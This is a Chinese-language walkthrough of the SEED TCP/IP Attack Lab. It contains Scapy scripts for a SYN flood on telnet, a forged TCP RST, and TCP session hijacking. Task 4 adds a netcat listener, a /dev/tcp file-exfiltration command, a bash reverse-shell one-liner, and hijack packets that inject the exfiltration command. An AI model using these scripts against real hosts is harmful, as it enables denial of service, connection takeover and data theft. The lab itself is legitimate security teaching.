TCP/IP Attack Lab
目录
启动环境
Task 1.1: Launching the Attack Using Python
攻击前先查看状态
netstat -tna
#!/bin/env python3
from scapy.all import IP, TCP, send
from ipaddress import IPv4Address
from random import getrandbits
ip = IP(dst="10.9.0.5")
tcp = TCP(dport=23, flags='S')
pkt = ip/tcp
while True:
pkt[IP].src = str(IPv4Address(getrandbits(32))) # source iP
pkt[TCP].sport = getrandbits(16) # source port
pkt[TCP].seq = getrandbits(32) # sequence number
send(pkt, verbose = 0)
让攻击持续至少一分钟,然后试着进入受害者的机器,看看你是否能成功。你的攻击很可能会失败,这里进入victim的主机,发现很多半连接
Task 1.2: Launch the Attack Using C
Task 2: TCP RST Attacks on telnet Connections
进入10.9.0.6 telnet 10.9.0.7,并用wireshark抓包
抓包根据7给6的数据,更改py文件如下
#!/usr/bin/env python3
from scapy.all import *
ip = IP(src="10.9.0.6", dst="10.9.0.7")
tcp = TCP(sport=36030, dport=23, flags="R", seq=1574683417, ack=2506752736)
pkt = ip/tcp
ls(pkt)
send(pkt,verbose=0)
发现连接到7的connection断了
Task 3: TCP Session Hijacking
修改代码,添加data(随便一个16进制
#!/usr/bin/env python3
from scapy.all import *
ip = IP(src="10.9.0.6", dst="10.9.0.7")
tcp = TCP(sport=36074, dport=23, flags="R", seq=2758682726, ack=3314205569)
data="68656c6c6f20776f726c64"
pkt = ip/tcp/data
ls(pkt)
send(pkt,verbose=0)
Task 4: Creating Reverse Shell using TCP Session Hijacking
攻击机:10.9.0.7
nc -lv 9090
在攻击机开启监听
受害机:10.9.0.5
cat /home/seed/secret> /dev/tcp/10.9.0.7/9090
$ /bin/bash -i > /dev/tcp/10.9.0.7/9090 0<&1 2>&1
并在10.9.0.6telnet 10.9.0.5,抓包,得到参数如下
#!/usr/bin/env python3
from scapy.all import *
print("SENDING SESSION HIJACKING PACKET.........")
IPLayer = IP(src="10.9.0.6", dst="10.9.0.5")
# 6给5的 tcp数据包的参数
TCPLayer = TCP(sport=48852, dport=23, flags="A", seq=3017821363, ack=2102281185)
Data = "r cat /home/seed/secret > /dev/tcp/10.9.0.7/9090r"
pkt = IPLayer/TCPLayer/Data
ls(pkt)
send(pkt,verbose=0)
# Transmission Control Protocol, Src Port: 48852, Dst Port: 23, Seq: 3017821363, Ack: 2102281185, Len: 0
攻击者获得shell,能够在受害服务器上执行命令
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
THE END
二维码